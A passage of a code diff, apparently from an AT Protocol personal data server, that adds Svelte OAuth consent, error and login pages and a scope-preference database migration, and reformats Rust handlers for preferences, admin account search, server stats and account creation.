132 + const scopeInfo = consentData?.scopes.find(s => s.scope === scope) 133 + if (scopeInfo?.required) return 134 + scopeSelections[scope] = !scopeSelections[scope] 135 + } 136 + 137 + function groupScopesByCategory(scopes: ScopeInfo[]): Record<string, ScopeInfo[]> { 138 + const groups: Record<string, ScopeInfo[]> = {} 139 + for (const scope of scopes) { 140 + if (!groups[scope.category]) { 141 + groups[scope.category] = [] 142 + } 143 + groups[scope.category].push(scope) 144 + } 145 + return groups 146 + } 147 + 148 + $effect(() => { 149 + fetchConsentData() 150 + }) 151 + 152 + let scopeGroups = $derived(consentData ? groupScopesByCategory(consentData.scopes) : {}) 153 + </script> 154 + 155 + <div class="consent-container"> 156 + {#if loading} 157 + <div class="loading"> 158 + <p>Loading...</p> 159 + </div> 160 + {:else if error} 161 + <div class="error-container"> 162 + <h1>Authorization Error</h1> 163 + <div class="error">{error}</div> 164 + <button type="button" onclick={() => navigate('/login')}> 165 + Return to Login 166 + </button> 167 + </div> 168 + {:else if consentData} 169 + <div class="client-info"> 170 + {#if consentData.logo_uri} 171 + <img src={consentData.logo_uri} alt="" class="client-logo" /> 172 + {/if} 173 + <h1>{consentData.client_name || 'Application'}</h1> 174 + <p class="subtitle">wants to access your account</p> 175 + {#if consentData.client_uri} 176 + <a href={consentData.client_uri} target="_blank" rel="noopener noreferrer" class="client-link"> 177 + {consentData.client_uri} 178 + </a> 179 + {/if} 180 + </div> 181 + 182 + <div class="account-info"> 183 + <span class="label">Signing in as:</span> 184 + <span class="did">{consentData.did}</span> 185 + </div> 186 + 187 + <div class="scopes-section"> 188 + <h2>Permissions Requested</h2> 189 + {#each Object.entries(scopeGroups) as [category, scopes]} 190 + <div class="scope-group"> 191 + <h3 class="category-title">{category}</h3> 192 + {#each scopes as scope} 193 + <label class="scope-item" class:required={scope.required}> 194 + <input 195 + type="checkbox" 196 + checked={scopeSelections[scope.scope]} 197 + disabled={scope.required || submitting} 198 + onchange={() => handleScopeToggle(scope.scope)} 199 + /> 200 + <div class="scope-info"> 201 + <span class="scope-name">{scope.display_name}</span> 202 + <span class="scope-description">{scope.description}</span> 203 + {#if scope.required} 204 + <span class="required-badge">Required</span> 205 + {/if} 206 + </div> 207 + </label> 208 + {/each} 209 + </div> 210 + {/each} 211 + </div> 212 + 213 + <label class="remember-choice"> 214 + <input type="checkbox" bind:checked={rememberChoice} disabled={submitting} /> 215 + <span>Remember my choice for this application</span> 216 + </label> 217 + 218 + <div class="actions"> 219 + <button type="button" class="deny-btn" onclick={handleDeny} disabled={submitting}> 220 + Deny 221 + </button> 222 + <button type="button" class="approve-btn" onclick={submitConsent} disabled={submitting}> 223 + {submitting ? 'Authorizing...' : 'Authorize'} 224 + </button> 225 + </div> 226 + {/if} 227 + </div> 228 + 229 + <style> 230 + .consent-container { 231 + max-width: 480px; 232 + margin: 2rem auto; 233 + padding: 2rem; 234 + } 235 + 236 + .loading { 237 + display: flex; 238 + align-items: center; 239 + justify-content: center; 240 + min-height: 200px; 241 + color: var(--text-secondary); 242 + } 243 + 244 + .error-container { 245 + text-align: center; 246 + } 247 + 248 + .error { 249 + padding: 0.75rem; 250 + background: var(--error-bg); 251 + border: 1px solid var(--error-border); 252 + border-radius: 4px; 253 + color: var(--error-text); 254 + margin-bottom: 1rem; 255 + } 256 + 257 + .client-info { 258 + text-align: center; 259 + margin-bottom: 1.5rem; 260 + } 261 + 262 + .client-logo { 263 + width: 64px; 264 + height: 64px; 265 + border-radius: 12px; 266 + margin-bottom: 1rem; 267 + } 268 + 269 + .client-info h1 { 270 + margin: 0 0 0.25rem 0; 271 + font-size: 1.5rem; 272 + } 273 + 274 + .subtitle { 275 + color: var(--text-secondary); 276 + margin: 0; 277 + } 278 + 279 + .client-link { 280 + display: inline-block; 281 + margin-top: 0.5rem; 282 + font-size: 0.875rem; 283 + color: var(--accent); 284 + text-decoration: none; 285 + } 286 + 287 + .client-link:hover { 288 + text-decoration: underline; 289 + } 290 + 291 + .account-info { 292 + display: flex; 293 + flex-direction: column; 294 + gap: 0.25rem; 295 + padding: 1rem; 296 + background: var(--bg-secondary); 297 + border-radius: 8px; 298 + margin-bottom: 1.5rem; 299 + } 300 + 301 + .account-info .label { 302 + font-size: 0.75rem; 303 + color: var(--text-muted); 304 + text-transform: uppercase; 305 + letter-spacing: 0.05em; 306 + } 307 + 308 + .account-info .did { 309 + font-family: monospace; 310 + font-size: 0.875rem; 311 + color: var(--text-primary); 312 + word-break: break-all; 313 + } 314 + 315 + .scopes-section { 316 + margin-bottom: 1.5rem; 317 + } 318 + 319 + .scopes-section h2 { 320 + font-size: 1rem; 321 + margin: 0 0 1rem 0; 322 + color: var(--text-secondary); 323 + } 324 + 325 + .scope-group { 326 + margin-bottom: 1rem; 327 + } 328 + 329 + .category-title { 330 + font-size: 0.875rem; 331 + font-weight: 600; 332 + color: var(--text-primary); 333 + margin: 0 0 0.5rem 0; 334 + padding-bottom: 0.25rem; 335 + border-bottom: 1px solid var(--border-color); 336 + } 337 + 338 + .scope-item { 339 + display: flex; 340 + gap: 0.75rem; 341 + padding: 0.75rem; 342 + background: var(--bg-card); 343 + border: 1px solid var(--border-color); 344 + border-radius: 6px; 345 + margin-bottom: 0.5rem; 346 + cursor: pointer; 347 + transition: border-color 0.15s; 348 + } 349 + 350 + .scope-item:hover:not(.required) { 351 + border-color: var(--accent); 352 + } 353 + 354 + .scope-item.required { 355 + background: var(--bg-secondary); 356 + } 357 + 358 + .scope-item input[type="checkbox"] { 359 + flex-shrink: 0; 360 + width: 18px; 361 + height: 18px; 362 + margin-top: 2px; 363 + } 364 + 365 + .scope-info { 366 + flex: 1; 367 + display: flex; 368 + flex-direction: column; 369 + gap: 0.125rem; 370 + } 371 + 372 + .scope-name { 373 + font-weight: 500; 374 + color: var(--text-primary); 375 + } 376 + 377 + .scope-description { 378 + font-size: 0.875rem; 379 + color: var(--text-secondary); 380 + } 381 + 382 + .required-badge { 383 + display: inline-block; 384 + font-size: 0.625rem; 385 + padding: 0.125rem 0.375rem; 386 + background: var(--warning-bg); 387 + color: var(--warning-text); 388 + border-radius: 3px; 389 + text-transform: uppercase; 390 + letter-spacing: 0.05em; 391 + margin-top: 0.25rem; 392 + width: fit-content; 393 + } 394 + 395 + .remember-choice { 396 + display: flex; 397 + align-items: center; 398 + gap: 0.5rem; 399 + margin-bottom: 1.5rem; 400 + cursor: pointer; 401 + color: var(--text-secondary); 402 + font-size: 0.875rem; 403 + } 404 + 405 + .remember-choice input { 406 + width: 16px; 407 + height: 16px; 408 + } 409 + 410 + .actions { 411 + display: flex; 412 + gap: 1rem; 413 + } 414 + 415 + .actions button { 416 + flex: 1; 417 + padding: 0.875rem; 418 + border: none; 419 + border-radius: 6px; 420 + font-size: 1rem; 421 + font-weight: 500; 422 + cursor: pointer; 423 + transition: background-color 0.15s; 424 + } 425 + 426 + .actions button:disabled { 427 + opacity: 0.6; 428 + cursor: not-allowed; 429 + } 430 + 431 + .deny-btn { 432 + background: var(--bg-secondary); 433 + color: var(--text-primary); 434 + border: 1px solid var(--border-color); 435 + } 436 + 437 + .deny-btn:hover:not(:disabled) { 438 + background: var(--error-bg); 439 + border-color: var(--error-border); 440 + color: var(--error-text); 441 + } 442 + 443 + .approve-btn { 444 + background: var(--accent); 445 + color: white; 446 + } 447 + 448 + .approve-btn:hover:not(:disabled) { 449 + background: var(--accent-hover); 450 + } 451 + </style>
+81
frontend/src/routes/OAuthError.svelte
···
··· 1 + <script lang="ts"> 2 + function getError(): string { 3 + const params = new URLSearchParams(window.location.hash.split('?')[1] || '') 4 + return params.get('error') || 'Unknown error' 5 + } 6 + 7 + function getErrorDescription(): string | null { 8 + const params = new URLSearchParams(window.location.hash.split('?')[1] || '') 9 + return params.get('error_description') 10 + } 11 + 12 + function handleBack() { 13 + window.history.back() 14 + } 15 + 16 + let error = $derived(getError()) 17 + let errorDescription = $derived(getErrorDescription()) 18 + </script> 19 + 20 + <div class="oauth-error-container"> 21 + <h1>Authorization Error</h1> 22 + 23 + <div class="error-box"> 24 + <div class="error-code">{error}</div> 25 + {#if errorDescription} 26 + <div class="error-description">{errorDescription}</div> 27 + {/if} 28 + </div> 29 + 30 + <button type="button" onclick={handleBack}> 31 + Go Back 32 + </button> 33 + </div> 34 + 35 + <style> 36 + .oauth-error-container { 37 + max-width: 400px; 38 + margin: 4rem auto; 39 + padding: 2rem; 40 + text-align: center; 41 + } 42 + 43 + h1 { 44 + margin: 0 0 1.5rem 0; 45 + color: var(--error-text); 46 + } 47 + 48 + .error-box { 49 + padding: 1.5rem; 50 + background: var(--error-bg); 51 + border: 1px solid var(--error-border); 52 + border-radius: 8px; 53 + margin-bottom: 1.5rem; 54 + } 55 + 56 + .error-code { 57 + font-family: monospace; 58 + font-size: 1rem; 59 + color: var(--error-text); 60 + margin-bottom: 0.5rem; 61 + } 62 + 63 + .error-description { 64 + color: var(--text-secondary); 65 + font-size: 0.875rem; 66 + } 67 + 68 + button { 69 + padding: 0.75rem 1.5rem; 70 + background: var(--accent); 71 + color: white; 72 + border: none; 73 + border-radius: 4px; 74 + font-size: 1rem; 75 + cursor: pointer; 76 + } 77 + 78 + button:hover { 79 + background: var(--accent-hover); 80 + } 81 + </style>
+269
frontend/src/routes/OAuthLogin.svelte
···
··· 1 + <script lang="ts"> 2 + import { navigate } from '../lib/router.svelte' 3 + 4 + let username = $state('') 5 + let password = $state('') 6 + let rememberDevice = $state(false) 7 + let submitting = $state(false) 8 + let error = $state<string | null>(null) 9 + 10 + function getRequestUri(): string | null { 11 + const params = new URLSearchParams(window.location.hash.split('?')[1] || '') 12 + return params.get('request_uri') 13 + } 14 + 15 + function getErrorFromUrl(): string | null { 16 + const params = new URLSearchParams(window.location.hash.split('?')[1] || '') 17 + return params.get('error') 18 + } 19 + 20 + $effect(() => { 21 + const urlError = getErrorFromUrl() 22 + if (urlError) { 23 + error = urlError 24 + } 25 + }) 26 + 27 + async function handleSubmit(e: Event) { 28 + e.preventDefault() 29 + const requestUri = getRequestUri() 30 + if (!requestUri) { 31 + error = 'Missing request_uri parameter' 32 + return 33 + } 34 + 35 + submitting = true 36 + error = null 37 + 38 + try { 39 + const response = await fetch('/oauth/authorize', { 40 + method: 'POST', 41 + headers: { 42 + 'Content-Type': 'application/json', 43 + 'Accept': 'application/json' 44 + }, 45 + body: JSON.stringify({ 46 + request_uri: requestUri, 47 + username, 48 + password, 49 + remember_device: rememberDevice 50 + }) 51 + }) 52 + 53 + const data = await response.json() 54 + 55 + if (!response.ok) { 56 + error = data.error_description || data.error || 'Login failed' 57 + submitting = false 58 + return 59 + } 60 + 61 + if (data.needs_2fa) { 62 + navigate(`/oauth/2fa?request_uri=${encodeURIComponent(requestUri)}&channel=${encodeURIComponent(data.channel || '')}`) 63 + return 64 + } 65 + 66 + if (data.redirect_uri) { 67 + window.location.href = data.redirect_uri 68 + return 69 + } 70 + 71 + error = 'Unexpected response from server' 72 + submitting = false 73 + } catch { 74 + error = 'Failed to connect to server' 75 + submitting = false 76 + } 77 + } 78 + 79 + async function handleCancel() { 80 + const requestUri = getRequestUri() 81 + if (!requestUri) { 82 + window.history.back() 83 + return 84 + } 85 + 86 + submitting = true 87 + try { 88 + const response = await fetch('/oauth/authorize/deny', { 89 + method: 'POST', 90 + headers: { 91 + 'Content-Type': 'application/json', 92 + 'Accept': 'application/json' 93 + }, 94 + body: JSON.stringify({ request_uri: requestUri }) 95 + }) 96 + 97 + const data = await response.json() 98 + if (data.redirect_uri) { 99 + window.location.href = data.redirect_uri 100 + } 101 + } catch { 102 + window.history.back() 103 + } 104 + } 105 + </script> 106 + 107 + <div class="oauth-login-container"> 108 + <h1>Sign In</h1> 109 + <p class="subtitle">Sign in to continue to the application</p> 110 + 111 + {#if error} 112 + <div class="error">{error}</div> 113 + {/if} 114 + 115 + <form onsubmit={handleSubmit}> 116 + <div class="field"> 117 + <label for="username">Handle or Email</label> 118 + <input 119 + id="username" 120 + type="text" 121 + bind:value={username} 122 + placeholder="you@example.com or handle" 123 + disabled={submitting} 124 + required 125 + autocomplete="username" 126 + /> 127 + </div> 128 + 129 + <div class="field"> 130 + <label for="password">Password</label> 131 + <input 132 + id="password" 133 + type="password" 134 + bind:value={password} 135 + disabled={submitting} 136 + required 137 + autocomplete="current-password" 138 + /> 139 + </div> 140 + 141 + <label class="remember-device"> 142 + <input type="checkbox" bind:checked={rememberDevice} disabled={submitting} /> 143 + <span>Remember this device</span> 144 + </label> 145 + 146 + <div class="actions"> 147 + <button type="button" class="cancel-btn" onclick={handleCancel} disabled={submitting}> 148 + Cancel 149 + </button> 150 + <button type="submit" class="submit-btn" disabled={submitting || !username || !password}> 151 + {submitting ? 'Signing in...' : 'Sign In'} 152 + </button> 153 + </div> 154 + </form> 155 + </div> 156 + 157 + <style> 158 + .oauth-login-container { 159 + max-width: 400px; 160 + margin: 4rem auto; 161 + padding: 2rem; 162 + } 163 + 164 + h1 { 165 + margin: 0 0 0.5rem 0; 166 + } 167 + 168 + .subtitle { 169 + color: var(--text-secondary); 170 + margin: 0 0 2rem 0; 171 + } 172 + 173 + form { 174 + display: flex; 175 + flex-direction: column; 176 + gap: 1rem; 177 + } 178 + 179 + .field { 180 + display: flex; 181 + flex-direction: column; 182 + gap: 0.25rem; 183 + } 184 + 185 + label { 186 + font-size: 0.875rem; 187 + font-weight: 500; 188 + } 189 + 190 + input[type="text"], 191 + input[type="password"] { 192 + padding: 0.75rem; 193 + border: 1px solid var(--border-color-light); 194 + border-radius: 4px; 195 + font-size: 1rem; 196 + background: var(--bg-input); 197 + color: var(--text-primary); 198 + } 199 + 200 + input:focus { 201 + outline: none; 202 + border-color: var(--accent); 203 + } 204 + 205 + .remember-device { 206 + display: flex; 207 + align-items: center; 208 + gap: 0.5rem; 209 + cursor: pointer; 210 + color: var(--text-secondary); 211 + font-size: 0.875rem; 212 + } 213 + 214 + .remember-device input { 215 + width: 16px; 216 + height: 16px; 217 + } 218 + 219 + .error { 220 + padding: 0.75rem; 221 + background: var(--error-bg); 222 + border: 1px solid var(--error-border); 223 + border-radius: 4px; 224 + color: var(--error-text); 225 + margin-bottom: 1rem; 226 + } 227 + 228 + .actions { 229 + display: flex; 230 + gap: 1rem; 231 + margin-top: 0.5rem; 232 + } 233 + 234 + .actions button { 235 + flex: 1; 236 + padding: 0.75rem; 237 + border: none; 238 + border-radius: 4px; 239 + font-size: 1rem; 240 + cursor: pointer; 241 + transition: background-color 0.15s; 242 + } 243 + 244 + .actions button:disabled { 245 + opacity: 0.6; 246 + cursor: not-allowed; 247 + } 248 + 249 + .cancel-btn { 250 + background: var(--bg-secondary); 251 + color: var(--text-primary); 252 + border: 1px solid var(--border-color); 253 + } 254 + 255 + .cancel-btn:hover:not(:disabled) { 256 + background: var(--error-bg); 257 + border-color: var(--error-border); 258 + color: var(--error-text); 259 + } 260 + 261 + .submit-btn { 262 + background: var(--accent); 263 + color: white; 264 + } 265 + 266 + .submit-btn:hover:not(:disabled) { 267 + background: var(--accent-hover); 268 + } 269 + </style>
+12
migrations/20251221_oauth_scope_preferences.sql
···
··· 1 + CREATE TABLE oauth_scope_preference ( 2 + id UUID PRIMARY KEY DEFAULT gen_random_uuid(), 3 + did TEXT NOT NULL REFERENCES users(did) ON DELETE CASCADE, 4 + client_id TEXT NOT NULL, 5 + scope TEXT NOT NULL, 6 + granted BOOLEAN NOT NULL DEFAULT TRUE, 7 + created_at TIMESTAMPTZ NOT NULL DEFAULT NOW(), 8 + updated_at TIMESTAMPTZ NOT NULL DEFAULT NOW(), 9 + UNIQUE(did, client_id, scope) 10 + ); 11 + 12 + CREATE INDEX idx_oauth_scope_pref_lookup ON oauth_scope_preference(did, client_id);
+33 -29
src/api/actor/preferences.rs
··· 32 .into_response(); 33 } 34 }; 35 - let auth_user = match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 36 - Ok(user) => user, 37 - Err(_) => { 38 - return ( 39 - StatusCode::UNAUTHORIZED, 40 - Json(json!({"error": "AuthenticationFailed"})), 41 - ) 42 - .into_response(); 43 - } 44 - }; 45 let user_id: uuid::Uuid = 46 match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", auth_user.did) 47 .fetch_optional(&state.db) ··· 109 .into_response(); 110 } 111 }; 112 - let auth_user = match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 113 - Ok(user) => user, 114 - Err(_) => { 115 return ( 116 - StatusCode::UNAUTHORIZED, 117 - Json(json!({"error": "AuthenticationFailed"})), 118 ) 119 .into_response(); 120 } 121 }; 122 - let (user_id, is_migration): (uuid::Uuid, bool) = 123 - match sqlx::query!("SELECT id, deactivated_at FROM users WHERE did = $1", auth_user.did) 124 - .fetch_optional(&state.db) 125 - .await 126 - { 127 - Ok(Some(row)) => (row.id, row.deactivated_at.is_some()), 128 - _ => { 129 - return ( 130 - StatusCode::INTERNAL_SERVER_ERROR, 131 - Json(json!({"error": "InternalError", "message": "User not found"})), 132 - ) 133 - .into_response(); 134 - } 135 - }; 136 if input.preferences.len() > MAX_PREFERENCES_COUNT { 137 return ( 138 StatusCode::BAD_REQUEST,
··· 32 .into_response(); 33 } 34 }; 35 + let auth_user = 36 + match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 37 + Ok(user) => user, 38 + Err(_) => { 39 + return ( 40 + StatusCode::UNAUTHORIZED, 41 + Json(json!({"error": "AuthenticationFailed"})), 42 + ) 43 + .into_response(); 44 + } 45 + }; 46 let user_id: uuid::Uuid = 47 match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", auth_user.did) 48 .fetch_optional(&state.db) ··· 110 .into_response(); 111 } 112 }; 113 + let auth_user = 114 + match crate::auth::validate_bearer_token_allow_deactivated(&state.db, &token).await { 115 + Ok(user) => user, 116 + Err(_) => { 117 + return ( 118 + StatusCode::UNAUTHORIZED, 119 + Json(json!({"error": "AuthenticationFailed"})), 120 + ) 121 + .into_response(); 122 + } 123 + }; 124 + let (user_id, is_migration): (uuid::Uuid, bool) = match sqlx::query!( 125 + "SELECT id, deactivated_at FROM users WHERE did = $1", 126 + auth_user.did 127 + ) 128 + .fetch_optional(&state.db) 129 + .await 130 + { 131 + Ok(Some(row)) => (row.id, row.deactivated_at.is_some()), 132 + _ => { 133 return ( 134 + StatusCode::INTERNAL_SERVER_ERROR, 135 + Json(json!({"error": "InternalError", "message": "User not found"})), 136 ) 137 .into_response(); 138 } 139 }; 140 if input.preferences.len() > MAX_PREFERENCES_COUNT { 141 return ( 142 StatusCode::BAD_REQUEST,
+2 -3
src/api/admin/account/info.rs
··· 93 .map(|q| { 94 q.split('&') 95 .filter_map(|pair| { 96 - let mut parts = pair.splitn(2, '='); 97 - let k = parts.next()?; 98 - let v = parts.next()?; 99 if k == key { 100 Some(urlencoding::decode(v).ok()?.into_owned()) 101 } else {
··· 93 .map(|q| { 94 q.split('&') 95 .filter_map(|pair| { 96 + let (k, v) = pair.split_once('=')?; 97 + 98 if k == key { 99 Some(urlencoding::decode(v).ok()?.into_owned()) 100 } else {
+27 -13
src/api/admin/account/search.rs
··· 54 let limit = params.limit.clamp(1, 100); 55 let cursor_did = params.cursor.as_deref().unwrap_or(""); 56 let handle_filter = params.handle.as_deref().map(|h| format!("%{}%", h)); 57 - let result = sqlx::query_as::<_, (String, String, Option<String>, chrono::DateTime<chrono::Utc>, bool, Option<chrono::DateTime<chrono::Utc>>)>( 58 r#" 59 SELECT did, handle, email, created_at, email_verified, deactivated_at 60 FROM users ··· 74 let accounts: Vec<AccountView> = rows 75 .into_iter() 76 .take(limit as usize) 77 - .map(|(did, handle, email, created_at, email_verified, deactivated_at)| AccountView { 78 - did: did.clone(), 79 - handle, 80 - email, 81 - indexed_at: created_at.to_rfc3339(), 82 - email_verified_at: if email_verified { 83 - Some(created_at.to_rfc3339()) 84 - } else { 85 - None 86 }, 87 - deactivated_at: deactivated_at.map(|dt| dt.to_rfc3339()), 88 - invites_disabled: None, 89 - }) 90 .collect(); 91 let next_cursor = if has_more { 92 accounts.last().map(|a| a.did.clone())
··· 54 let limit = params.limit.clamp(1, 100); 55 let cursor_did = params.cursor.as_deref().unwrap_or(""); 56 let handle_filter = params.handle.as_deref().map(|h| format!("%{}%", h)); 57 + let result = sqlx::query_as::< 58 + _, 59 + ( 60 + String, 61 + String, 62 + Option<String>, 63 + chrono::DateTime<chrono::Utc>, 64 + bool, 65 + Option<chrono::DateTime<chrono::Utc>>, 66 + ), 67 + >( 68 r#" 69 SELECT did, handle, email, created_at, email_verified, deactivated_at 70 FROM users ··· 84 let accounts: Vec<AccountView> = rows 85 .into_iter() 86 .take(limit as usize) 87 + .map( 88 + |(did, handle, email, created_at, email_verified, deactivated_at)| { 89 + AccountView { 90 + did: did.clone(), 91 + handle, 92 + email, 93 + indexed_at: created_at.to_rfc3339(), 94 + email_verified_at: if email_verified { 95 + Some(created_at.to_rfc3339()) 96 + } else { 97 + None 98 + }, 99 + deactivated_at: deactivated_at.map(|dt| dt.to_rfc3339()), 100 + invites_disabled: None, 101 + } 102 }, 103 + ) 104 .collect(); 105 let next_cursor = if has_more { 106 accounts.last().map(|a| a.did.clone())
+10 -12
src/api/admin/server_stats.rs
··· 16 pub blob_storage_bytes: i64, 17 } 18 19 - pub async fn get_server_stats( 20 - State(state): State<AppState>, 21 - _auth: BearerAuthAdmin, 22 - ) -> Response { 23 let user_count: i64 = match sqlx::query_scalar!("SELECT COUNT(*) FROM users") 24 .fetch_one(&state.db) 25 .await ··· 47 Err(_) => 0, 48 }; 49 50 - let blob_storage_bytes: i64 = match sqlx::query_scalar!("SELECT COALESCE(SUM(size_bytes), 0)::BIGINT FROM blobs") 51 - .fetch_one(&state.db) 52 - .await 53 - { 54 - Ok(Some(bytes)) => bytes, 55 - Ok(None) => 0, 56 - Err(_) => 0, 57 - }; 58 59 Json(ServerStatsResponse { 60 user_count,
··· 16 pub blob_storage_bytes: i64, 17 } 18 19 + pub async fn get_server_stats(State(state): State<AppState>, _auth: BearerAuthAdmin) -> Response { 20 let user_count: i64 = match sqlx::query_scalar!("SELECT COUNT(*) FROM users") 21 .fetch_one(&state.db) 22 .await ··· 44 Err(_) => 0, 45 }; 46 47 + let blob_storage_bytes: i64 = 48 + match sqlx::query_scalar!("SELECT COALESCE(SUM(size_bytes), 0)::BIGINT FROM blobs") 49 + .fetch_one(&state.db) 50 + .await 51 + { 52 + Ok(Some(bytes)) => bytes, 53 + Ok(None) => 0, 54 + Err(_) => 0, 55 + }; 56 57 Json(ServerStatsResponse { 58 user_count,
+164 -147
src/api/identity/account.rs
··· 21 fn extract_client_ip(headers: &HeaderMap) -> String { 22 if let Some(forwarded) = headers.get("x-forwarded-for") 23 && let Ok(value) = forwarded.to_str() 24 - && let Some(first_ip) = value.split(',').next() { 25 - return first_ip.trim().to_string(); 26 - } 27 if let Some(real_ip) = headers.get("x-real-ip") 28 - && let Ok(value) = real_ip.to_str() { 29 - return value.trim().to_string(); 30 - } 31 "unknown".to_string() 32 } 33 ··· 114 }; 115 116 let is_migration = migration_auth.is_some() 117 - && input.did.as_ref().map(|d| d.starts_with("did:plc:")).unwrap_or(false); 118 119 if is_migration { 120 let migration_did = input.did.as_ref().unwrap(); ··· 147 .map(|e| e.trim().to_string()) 148 .filter(|e| !e.is_empty()); 149 if let Some(ref email) = email 150 - && !crate::api::validation::is_valid_email(email) { 151 - return ( 152 - StatusCode::BAD_REQUEST, 153 - Json(json!({"error": "InvalidEmail", "message": "Invalid email format"})), 154 - ) 155 - .into_response(); 156 - } 157 let verification_channel = input.verification_channel.as_deref().unwrap_or("email"); 158 let valid_channels = ["email", "discord", "telegram", "signal"]; 159 if !valid_channels.contains(&verification_channel) && !is_migration { ··· 366 }; 367 if is_migration { 368 let existing_account: Option<(uuid::Uuid, String, Option<chrono::DateTime<chrono::Utc>>)> = 369 - sqlx::query_as( 370 - "SELECT id, handle, deactivated_at FROM users WHERE did = $1 FOR UPDATE", 371 - ) 372 - .bind(&did) 373 - .fetch_optional(&mut *tx) 374 - .await 375 - .unwrap_or(None); 376 if let Some((account_id, old_handle, deactivated_at)) = existing_account { 377 if deactivated_at.is_some() { 378 info!(did = %did, old_handle = %old_handle, new_handle = %short_handle, "Preparing existing account for inbound migration"); 379 - let update_result: Result<_, sqlx::Error> = sqlx::query( 380 - "UPDATE users SET handle = $1 WHERE id = $2", 381 - ) 382 - .bind(short_handle) 383 - .bind(account_id) 384 - .execute(&mut *tx) 385 - .await; 386 if let Err(e) = update_result { 387 - if let Some(db_err) = e.as_database_error() { 388 - if db_err.constraint().map(|c| c.contains("handle")).unwrap_or(false) { 389 - return ( 390 StatusCode::BAD_REQUEST, 391 Json(json!({"error": "HandleTaken", "message": "Handle already taken by another account"})), 392 ) 393 .into_response(); 394 - } 395 } 396 error!("Error reactivating account: {:?}", e); 397 return ( ··· 438 .into_response(); 439 } 440 }; 441 - let access_meta = match crate::auth::create_access_token_with_metadata(&did, &secret_key_bytes) { 442 - Ok(m) => m, 443 - Err(e) => { 444 - error!("Error creating access token: {:?}", e); 445 - return ( 446 - StatusCode::INTERNAL_SERVER_ERROR, 447 - Json(json!({"error": "InternalError"})), 448 - ) 449 - .into_response(); 450 - } 451 - }; 452 - let refresh_meta = match crate::auth::create_refresh_token_with_metadata(&did, &secret_key_bytes) { 453 Ok(m) => m, 454 Err(e) => { 455 error!("Error creating refresh token: {:?}", e); ··· 499 } 500 } 501 } 502 - let exists_result: Option<(i32,)> = sqlx::query_as( 503 - "SELECT 1 FROM users WHERE handle = $1 AND deactivated_at IS NULL", 504 - ) 505 - .bind(short_handle) 506 - .fetch_optional(&mut *tx) 507 - .await 508 - .unwrap_or(None); 509 if exists_result.is_some() { 510 return ( 511 StatusCode::BAD_REQUEST, ··· 516 let invite_code_required = std::env::var("INVITE_CODE_REQUIRED") 517 .map(|v| v == "true" || v == "1") 518 .unwrap_or(false); 519 - if invite_code_required && input.invite_code.as_ref().map(|c| c.trim().is_empty()).unwrap_or(true) { 520 return ( 521 StatusCode::BAD_REQUEST, 522 Json(json!({"error": "InvalidInviteCode", "message": "Invite code is required"})), 523 ) 524 .into_response(); 525 } 526 - if let Some(code) = &input.invite_code { 527 - if !code.trim().is_empty() { 528 - let invite_query = sqlx::query!( 529 - "SELECT available_uses FROM invite_codes WHERE code = $1 FOR UPDATE", 530 - code 531 - ) 532 - .fetch_optional(&mut *tx) 533 - .await; 534 - match invite_query { 535 - Ok(Some(row)) => { 536 - if row.available_uses <= 0 { 537 - return (StatusCode::BAD_REQUEST, Json(json!({"error": "InvalidInviteCode", "message": "Invite code exhausted"}))).into_response(); 538 - } 539 - let update_invite = sqlx::query!( 540 - "UPDATE invite_codes SET available_uses = available_uses - 1 WHERE code = $1", 541 - code 542 - ) 543 - .execute(&mut *tx) 544 - .await; 545 - if let Err(e) = update_invite { 546 - error!("Error updating invite code: {:?}", e); 547 - return ( 548 - StatusCode::INTERNAL_SERVER_ERROR, 549 - Json(json!({"error": "InternalError"})), 550 - ) 551 - .into_response(); 552 - } 553 } 554 - Ok(None) => { 555 - return ( 556 - StatusCode::BAD_REQUEST, 557 - Json(json!({"error": "InvalidInviteCode", "message": "Invite code not found"})), 558 - ) 559 - .into_response(); 560 - } 561 - Err(e) => { 562 - error!("Error checking invite code: {:?}", e); 563 return ( 564 StatusCode::INTERNAL_SERVER_ERROR, 565 Json(json!({"error": "InternalError"})), 566 ) 567 .into_response(); 568 } 569 } 570 } 571 } ··· 635 Ok((id,)) => id, 636 Err(e) => { 637 if let Some(db_err) = e.as_database_error() 638 - && db_err.code().as_deref() == Some("23505") { 639 - let constraint = db_err.constraint().unwrap_or(""); 640 - if constraint.contains("handle") || constraint.contains("users_handle") { 641 - return ( 642 - StatusCode::BAD_REQUEST, 643 - Json(json!({ 644 - "error": "HandleNotAvailable", 645 - "message": "Handle already taken" 646 - })), 647 - ) 648 - .into_response(); 649 - } else if constraint.contains("email") || constraint.contains("users_email") { 650 - return ( 651 - StatusCode::BAD_REQUEST, 652 - Json(json!({ 653 - "error": "InvalidEmail", 654 - "message": "Email already registered" 655 - })), 656 - ) 657 - .into_response(); 658 - } else if constraint.contains("did") || constraint.contains("users_did") { 659 - return ( 660 - StatusCode::BAD_REQUEST, 661 - Json(json!({ 662 - "error": "AccountAlreadyExists", 663 - "message": "An account with this DID already exists" 664 - })), 665 - ) 666 - .into_response(); 667 - } 668 } 669 error!("Error inserting user: {:?}", e); 670 return ( 671 StatusCode::INTERNAL_SERVER_ERROR, ··· 675 } 676 }; 677 678 - if !is_migration { 679 - if let Err(e) = sqlx::query!( 680 "INSERT INTO channel_verifications (user_id, channel, code, pending_identifier, expires_at) VALUES ($1, 'email', $2, $3, $4)", 681 user_id, 682 verification_code, ··· 692 ) 693 .into_response(); 694 } 695 - } 696 let encrypted_key_bytes = match crate::config::encrypt_key(&secret_key_bytes) { 697 Ok(enc) => enc, 698 Err(e) => { ··· 809 ) 810 .into_response(); 811 } 812 - if let Some(code) = &input.invite_code { 813 - if !code.trim().is_empty() { 814 - let use_insert = sqlx::query!( 815 - "INSERT INTO invite_code_uses (code, used_by_user) VALUES ($1, $2)", 816 - code, 817 - user_id 818 ) 819 - .execute(&mut *tx) 820 - .await; 821 - if let Err(e) = use_insert { 822 - error!("Error recording invite usage: {:?}", e); 823 - return ( 824 - StatusCode::INTERNAL_SERVER_ERROR, 825 - Json(json!({"error": "InternalError"})), 826 - ) 827 - .into_response(); 828 - } 829 } 830 } 831 if let Err(e) = tx.commit().await { ··· 838 } 839 if !is_migration { 840 if let Err(e) = 841 - crate::api::repo::record::sequence_identity_event(&state, &did, Some(&full_handle)).await 842 { 843 warn!("Failed to sequence identity event for {}: {}", did, e); 844 } 845 - if let 